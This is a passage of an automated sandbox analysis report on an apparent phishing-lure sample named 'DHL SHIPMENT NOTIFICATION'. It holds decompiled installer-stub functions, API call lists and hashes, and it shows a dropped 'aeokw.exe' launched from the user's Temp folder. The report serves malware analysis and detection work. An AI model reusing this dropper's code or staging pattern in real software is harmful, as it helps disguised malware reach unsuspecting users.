                        														__ecx =  *(__ebp - 0xc);
                        														__edx =  *(__ebp - 8);
                        														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                        														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                        														 *(__ebp - 0x38) = __eax;
                        														if(__ax == __bx) {
                        															goto L34;
                        														} else {
                        															goto L26;
                        														}
                        													}
                        												}
                        											}
                        										}
                        									}
                        								}
                        								goto L37;
                        								L26:
                        								__eax =  *(__ebp - 8);
                        							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                        						}
                        						goto L34;
                        					}
                        				}
                        				L37:
                        				return 0;
                        			}

                        APIs
                        • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                        • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                        • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                          • Part of subcall function 0040623F: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,?,?,004026D1,00000000,00000000,?,00000000,00000011), ref: 00406255
                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: File$Pointer$ByteCharMultiWide$Read
                        • String ID: 9
                        • API String ID: 163830602-2366072709
                        • Opcode ID: ea37fd964e3ddf3b7a618de9004236b276f671010f51a76b8aa07d43f39fc3cd
                        • Instruction ID: 3e360b617c3737f2e779930334e882a7207aef4f73e2c1e076e29b282e1bb3de
                        • Opcode Fuzzy Hash: ea37fd964e3ddf3b7a618de9004236b276f671010f51a76b8aa07d43f39fc3cd
                        • Instruction Fuzzy Hash: 60510B75D00219ABDF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E004056D0(signed int _a4, WCHAR* _a8) {
                        				struct HWND__* _v8;
                        				signed int _v12;
                        				WCHAR* _v32;
                        				long _v44;
                        				int _v48;
                        				void* _v52;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				WCHAR* _t27;
                        				signed int _t28;
                        				long _t29;
                        				signed int _t37;
                        				signed int _t38;
                        
                        				_t27 =  *0x7a7a84;
                        				_v8 = _t27;
                        				if(_t27 != 0) {
                        					_t37 =  *0x7a8b54;
                        					_v12 = _t37;
                        					_t38 = _t37 & 0x00000001;
                        					if(_t38 == 0) {
                        						E004066AB(_t38, 0, 0x7a0f68, 0x7a0f68, _a4);
                        					}
                        					_t27 = lstrlenW(0x7a0f68);
                        					_a4 = _t27;
                        					if(_a8 == 0) {
                        						L6:
                        						if((_v12 & 0x00000004) == 0) {
                        							_t27 = SetWindowTextW( *0x7a7a68, 0x7a0f68);
                        						}
                        						if((_v12 & 0x00000002) == 0) {
                        							_v32 = 0x7a0f68;
                        							_v52 = 1;
                        							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
                        							_v44 = 0;
                        							_v48 = _t29 - _t38;
                        							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
                        							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
                        						}
                        						if(_t38 != 0) {
                        							_t28 = _a4;
                        							0x7a0f68[_t28] = 0;
                        							return _t28;
                        						}
                        					} else {
                        						_t27 = lstrlenW(_a8) + _a4;
                        						if(_t27 < 0x1000) {
                        							_t27 = lstrcatW(0x7a0f68, _a8);
                        							goto L6;
                        						}
                        					}
                        				}
                        				return _t27;
                        			}

                        APIs
                        • lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
                        • lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
                        • lstrcatW.KERNEL32(007A0F68,004030A8), ref: 0040572B
                        • SetWindowTextW.USER32(007A0F68,007A0F68), ref: 0040573D
                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
                          • Part of subcall function 004066AB: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok,\Microsoft\Internet Explorer\Quick Launch), ref: 00406850
                          • Part of subcall function 004066AB: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok,00000000,007A0F68,?,00405707,007A0F68,00000000), ref: 004068AA
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: MessageSendlstrlen$lstrcat$TextWindow
                        • String ID:
                        • API String ID: 1495540970-0
                        • Opcode ID: 5359f18cea5025c05ea2e312da5c850c9979a77eaabc6fad8f28e044c716b6a3
                        • Instruction ID: b1df74b24ef97eccf04675f52fbaffa54a328febca5869b92639b2b84e823bb6
                        • Opcode Fuzzy Hash: 5359f18cea5025c05ea2e312da5c850c9979a77eaabc6fad8f28e044c716b6a3
                        • Instruction Fuzzy Hash: 32219D71900518FACF119FA5DD84ACFBFB8EF85350F10842AF904B6290C7794A40DFA8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 91%
                        			E004068F5(WCHAR* _a4) {
                        				short _t5;
                        				short _t7;
                        				WCHAR* _t19;
                        				WCHAR* _t20;
                        				WCHAR* _t21;
                        
                        				_t20 = _a4;
                        				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                        					_t20 =  &(_t20[4]);
                        				}
                        				if( *_t20 != 0 && E00405FB4(_t20) != 0) {
                        					_t20 =  &(_t20[2]);
                        				}
                        				_t5 =  *_t20;
                        				_t21 = _t20;
                        				_t19 = _t20;
                        				if(_t5 != 0) {
                        					do {
                        						if(_t5 > 0x1f &&  *((short*)(E00405F6A(L"*?|<>/\":", _t5))) == 0) {
                        							E00406119(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                        							_t19 = CharNextW(_t19);
                        						}
                        						_t20 = CharNextW(_t20);
                        						_t5 =  *_t20;
                        					} while (_t5 != 0);
                        				}
                        				 *_t19 =  *_t19 & 0x00000000;
                        				while(1) {
                        					_push(_t19);
                        					_push(_t21);
                        					_t19 = CharPrevW();
                        					_t7 =  *_t19;
                        					if(_t7 != 0x20 && _t7 != 0x5c) {
                        						break;
                        					}
                        					 *_t19 =  *_t19 & 0x00000000;
                        					if(_t21 < _t19) {
                        						continue;
                        					}
                        					break;
                        				}
                        				return _t7;
                        			}

                        APIs
                        • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00406958
                        • CharNextW.USER32(?,?,?,00000000,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00406967
                        • CharNextW.USER32(?,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 0040696C
                        • CharPrevW.USER32(?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 0040697F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: Char$Next$Prev
                        • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                        • API String ID: 589700163-4010320282
                        • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                        • Instruction ID: be6858c8d4b602c62de40fdc636a35535680886f1e3ed17f643e47e9e10769a1
                        • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                        • Instruction Fuzzy Hash: 0D11E6A580060295DB302B148C40A7762E8AF94750F12403FE98AB36C1E7BC4CA2C6BD
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0040302E(intOrPtr _a4) {
                        				short _v132;
                        				long _t6;
                        				struct HWND__* _t7;
                        				struct HWND__* _t15;
                        
                        				if(_a4 != 0) {
                        					_t15 =  *0x79f73c;
                        					if(_t15 != 0) {
                        						_t15 = DestroyWindow(_t15);
                        					}
                        					 *0x79f73c = 0;
                        					return _t15;
                        				}
                        				if( *0x79f73c != 0) {
                        					return E00406A77(0);
                        				}
                        				_t6 = GetTickCount();
                        				if(_t6 >  *0x7a8aac) {
                        					if( *0x7a8aa8 == 0) {
                        						_t7 = CreateDialogParamW( *0x7a8aa0, 0x6f, 0, E00402F93, 0);
                        						 *0x79f73c = _t7;
                        						return ShowWindow(_t7, 5);
                        					}
                        					if(( *0x7a8b54 & 0x00000001) != 0) {
                        						wsprintfW( &_v132, L"... %d%%", E00403012());
                        						return E004056D0(0,  &_v132);
                        					}
                        				}
                        				return _t6;
                        			}

                        APIs
                        • DestroyWindow.USER32(?,00000000), ref: 00403049
                        • GetTickCount.KERNEL32 ref: 00403067
                        • wsprintfW.USER32 ref: 00403095
                          • Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
                          • Part of subcall function 004056D0: lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
                          • Part of subcall function 004056D0: lstrcatW.KERNEL32(007A0F68,004030A8), ref: 0040572B
                          • Part of subcall function 004056D0: SetWindowTextW.USER32(007A0F68,007A0F68), ref: 0040573D
                          • Part of subcall function 004056D0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
                          • Part of subcall function 004056D0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
                          • Part of subcall function 004056D0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
                        • CreateDialogParamW.USER32 ref: 004030B9
                        • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                          • Part of subcall function 00403012: MulDiv.KERNEL32(?,00000064,?), ref: 00403027
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                        • String ID: ... %d%%
                        • API String ID: 722711167-2449383134
                        • Opcode ID: 54489552992201bc3988819c72fa622d06d96af98b9c9b950ef7c711f1b17aa9
                        • Instruction ID: 36a9105e1bf518e5a00a94211bbaadb265df24d4843d4ed97aac6270594080be
                        • Opcode Fuzzy Hash: 54489552992201bc3988819c72fa622d06d96af98b9c9b950ef7c711f1b17aa9
                        • Instruction Fuzzy Hash: 40015B70413610ABC7217FA0AD49A9A7FACAB01B06F50853BF441F25E9DA7C46458B9E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00404F85(struct HWND__* _a4, intOrPtr _a8) {
                        				long _v8;
                        				signed char _v12;
                        				unsigned int _v16;
                        				void* _v20;
                        				intOrPtr _v24;
                        				long _v56;
                        				void* _v60;
                        				long _t15;
                        				unsigned int _t19;
                        				signed int _t25;
                        				struct HWND__* _t28;
                        
                        				_t28 = _a4;
                        				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                        				if(_a8 == 0) {
                        					L4:
                        					_v56 = _t15;
                        					_v60 = 4;
                        					SendMessageW(_t28, 0x113e, 0,  &_v60);
                        					return _v24;
                        				}
                        				_t19 = GetMessagePos();
                        				_v16 = _t19 >> 0x10;
                        				_v20 = _t19;
                        				ScreenToClient(_t28,  &_v20);
                        				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                        				if((_v12 & 0x00000066) != 0) {
                        					_t15 = _v8;
                        					goto L4;
                        				}
                        				return _t25 | 0xffffffff;
                        			}

                        APIs
                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404FA0
                        • GetMessagePos.USER32 ref: 00404FA8
                        • ScreenToClient.USER32 ref: 00404FC2
                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FD4
                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FFA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: Message$Send$ClientScreen
                        • String ID: f
                        • API String ID: 41195575-1993550816
                        • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                        • Instruction ID: 51d4338ac073bbeac8b2964ce5aa15998fcdd55d82c6f64f668885239b8ba4c4
                        • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                        • Instruction Fuzzy Hash: D6015E7194021DBADB00DBA5DD85FFEBBBCAF54711F10012BBB50B61C0D7B49A058BA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                        				short _v132;
                        				void* _t11;
                        				WCHAR* _t19;
                        
                        				if(_a8 == 0x110) {
                        					SetTimer(_a4, 1, 0xfa, 0);
                        					_a8 = 0x113;
                        				}
                        				if(_a8 == 0x113) {
                        					_t11 = E00403012();
                        					_t19 = L"unpacking data: %d%%";
                        					if( *0x7a8ab0 == 0) {
                        						_t19 = L"verifying installer: %d%%";
                        					}
                        					wsprintfW( &_v132, _t19, _t11);
                        					SetWindowTextW(_a4,  &_v132);
                        					SetDlgItemTextW(_a4, 0x406,  &_v132);
                        				}
                        				return 0;
                        			}

                        APIs
                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                        • wsprintfW.USER32 ref: 00402FE5
                        • SetWindowTextW.USER32(?,?), ref: 00402FF5
                        • SetDlgItemTextW.USER32 ref: 00403007
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: Text$ItemTimerWindowwsprintf
                        • String ID: unpacking data: %d%%$verifying installer: %d%%
                        • API String ID: 1451636040-1158693248
                        • Opcode ID: 863410c55cf87ff373a2389e5224159976098539ce34d2f9597aa36d95ce2bb5
                        • Instruction ID: 8fb0b87627a2e5c232f470bc2292a7be8d93e7e9342cf65e243ccc0cc3a46c1c
                        • Opcode Fuzzy Hash: 863410c55cf87ff373a2389e5224159976098539ce34d2f9597aa36d95ce2bb5
                        • Instruction Fuzzy Hash: 74F0367050020DABEF246F50DD49BEA3B69EB40309F00C03AF606B51D0DBBD99549B59
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 93%
                        			E00402950(void* __ebx) {
                        				WCHAR* _t26;
                        				void* _t29;
                        				long _t37;
                        				void* _t49;
                        				void* _t52;
                        				void* _t54;
                        				void* _t56;
                        				void* _t59;
                        				void* _t60;
                        				void* _t61;
                        
                        				_t49 = __ebx;
                        				_t52 = 0xfffffd66;
                        				_t26 = E00402DA6(0xfffffff0);
                        				_t55 = _t26;
                        				 *(_t61 - 0x40) = _t26;
                        				if(E00405FB4(_t26) == 0) {
                        					E00402DA6(0xffffffed);
                        				}
                        				E00406139(_t55);
                        				_t29 = E0040615E(_t55, 0x40000000, 2);
                        				 *(_t61 + 8) = _t29;
                        				if(_t29 != 0xffffffff) {
                        					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                        					if( *(_t61 - 0x28) != _t49) {
                        						_t37 =  *0x7a8ab4;
                        						 *(_t61 - 0x44) = _t37;
                        						_t54 = GlobalAlloc(0x40, _t37);
                        						if(_t54 != _t49) {
                        							E004035FE(_t49);
                        							E004035E8(_t54,  *(_t61 - 0x44));
                        							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                        							 *(_t61 - 0x10) = _t59;
                        							if(_t59 != _t49) {
                        								E00403377(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                        								while( *_t59 != _t49) {
                        									_t51 =  *_t59;
                        									_t60 = _t59 + 8;
                        									 *(_t61 - 0x3c) =  *_t59;
                        									E00406119( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                        									_t59 = _t60 +  *(_t61 - 0x3c);
                        								}
                        								GlobalFree( *(_t61 - 0x10));
                        							}
                        							E00406210( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                        							GlobalFree(_t54);
                        							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                        						}
                        					}
                        					_t52 = E00403377(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                        					CloseHandle( *(_t61 + 8));
                        				}
                        				_t56 = 0xfffffff3;
                        				if(_t52 < _t49) {
                        					_t56 = 0xffffffef;
                        					DeleteFileW( *(_t61 - 0x40));
                        					 *((intOrPtr*)(_t61 - 4)) = 1;
                        				}
                        				_push(_t56);
                        				E00401423();
                        				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t61 - 4));
                        				return 0;
                        			}














                        APIs
                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                        • GlobalFree.KERNEL32 ref: 00402A06
                        • GlobalFree.KERNEL32 ref: 00402A19
                        • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                        • String ID:
                        • API String ID: 2667972263-0
                        • Opcode ID: 01061f3d3ca3a4d7c364cd067c19041a51f9a0b08810e1f4a161c9a0c4070a25
                        • Instruction ID: ec4356a3eb6c7711b506d5a245a30aad41ccfdb787a60eec272099fea1c037c4
                        • Opcode Fuzzy Hash: 01061f3d3ca3a4d7c364cd067c19041a51f9a0b08810e1f4a161c9a0c4070a25
                        • Instruction Fuzzy Hash: D431C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E1CB798D419B98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 48%
                        			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                        				void* _v8;
                        				int _v12;
                        				short _v536;
                        				void* _t27;
                        				signed int _t33;
                        				intOrPtr* _t35;
                        				signed int _t45;
                        				signed int _t46;
                        				signed int _t47;
                        
                        				_t46 = _a12;
                        				_t47 = _t46 & 0x00000300;
                        				_t45 = _t46 & 0x00000001;
                        				_t27 = E004064DB(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                        				if(_t27 == 0) {
                        					if((_a12 & 0x00000002) == 0) {
                        						L3:
                        						_push(0x105);
                        						_push( &_v536);
                        						_push(0);
                        						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                        							__eflags = _t45;
                        							if(__eflags != 0) {
                        								L10:
                        								RegCloseKey(_v8);
                        								return 0x3eb;
                        							}
                        							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                        							__eflags = _t33;
                        							if(_t33 != 0) {
                        								break;
                        							}
                        							_push(0x105);
                        							_push( &_v536);
                        							_push(_t45);
                        						}
                        						RegCloseKey(_v8);
                        						_t35 = E00406A3B(3);
                        						if(_t35 != 0) {
                        							return  *_t35(_a4, _a8, _t47, 0);
                        						}
                        						return RegDeleteKeyW(_a4, _a8);
                        					}
                        					_v12 = 0;
                        					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                        						goto L10;
                        					}
                        					goto L3;
                        				}
                        				return _t27;
                        			}













                        APIs
                        • RegEnumValueW.ADVAPI32 ref: 00402EFD
                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: CloseEnum$DeleteValue
                        • String ID:
                        • API String ID: 1354259210-0
                        • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                        • Instruction ID: e84adf69fee3246f56ef13a6fd4e717e0861f51d99737fac189c4d1833cff19f
                        • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                        • Instruction Fuzzy Hash: 31213B7150010ABBDF11AF90CE89EEF7B7DEB54384F110076F909B21E0D7B59E54AA68
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 77%
                        			E00401D81(void* __ebx, void* __edx) {
                        				struct HWND__* _t30;
                        				WCHAR* _t38;
                        				void* _t48;
                        				void* _t53;
                        				signed int _t55;
                        				signed int _t60;
                        				long _t63;
                        				void* _t65;
                        
                        				_t53 = __ebx;
                        				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                        					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                        				} else {
                        					E00402D84(2);
                        					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                        				}
                        				_t55 =  *(_t65 - 0x24);
                        				 *(_t65 + 8) = _t30;
                        				_t60 = _t55 & 0x00000004;
                        				 *(_t65 - 0x38) = _t55 & 0x00000003;
                        				 *(_t65 - 0x18) = _t55 >> 0x1f;
                        				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                        				if((_t55 & 0x00010000) == 0) {
                        					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                        				} else {
                        					_t38 = E00402DA6(0x11);
                        				}
                        				 *(_t65 - 0x44) = _t38;
                        				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                        				asm("sbb esi, esi");
                        				_t63 = LoadImageW( ~_t60 &  *0x7a8aa0,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                        				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                        				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                        					DeleteObject(_t48);
                        				}
                        				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                        					_push(_t63);
                        					E004065B5();
                        				}
                        				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t65 - 4));
                        				return 0;
                        			}












                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                        • String ID:
                        • API String ID: 1849352358-0
                        • Opcode ID: f665995d6bdb305172d13ad54de642187c856862005d3c57e5c2f614b82d9191
                        • Instruction ID: 474cd979728561ffe20026c9632071baa6ad0bc9fd2f813aa8d1396f3614d648
                        • Opcode Fuzzy Hash: f665995d6bdb305172d13ad54de642187c856862005d3c57e5c2f614b82d9191
                        • Instruction Fuzzy Hash: DC212672D00119AFCF05CBA4DE45AEEBBB5EF08304F14403AF945F62A0DB389951DB98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 73%
                        			E00401E4E(intOrPtr __edx) {
                        				void* __edi;
                        				int _t9;
                        				signed char _t15;
                        				struct HFONT__* _t18;
                        				intOrPtr _t30;
                        				void* _t31;
                        				struct HDC__* _t33;
                        				void* _t35;
                        
                        				_t30 = __edx;
                        				_t33 = GetDC( *(_t35 - 8));
                        				_t9 = E00402D84(2);
                        				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                        				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                        				ReleaseDC( *(_t35 - 8), _t33);
                        				 *0x40ce08 = E00402D84(3);
                        				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                        				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                        				 *0x40ce0f = 1;
                        				 *0x40ce0c = _t15 & 0x00000001;
                        				 *0x40ce0d = _t15 & 0x00000002;
                        				 *0x40ce0e = _t15 & 0x00000004;
                        				E004066AB(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
                        				_t18 = CreateFontIndirectW(0x40cdf8);
                        				_push(_t18);
                        				_push(_t31);
                        				E004065B5();
                        				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t35 - 4));
                        				return 0;
                        			}












                        APIs
                        • GetDC.USER32(?), ref: 00401E51
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                        • ReleaseDC.USER32 ref: 00401E84
                          • Part of subcall function 004066AB: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok,\Microsoft\Internet Explorer\Quick Launch), ref: 00406850
                          • Part of subcall function 004066AB: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok,00000000,007A0F68,?,00405707,007A0F68,00000000), ref: 004068AA
                        • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                        • String ID:
                        • API String ID: 2584051700-0
                        • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                        • Instruction ID: c4fbce1732c038d4ae3387388930f25584bd8a0c3a5059ecf0713bcf7412b626
                        • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
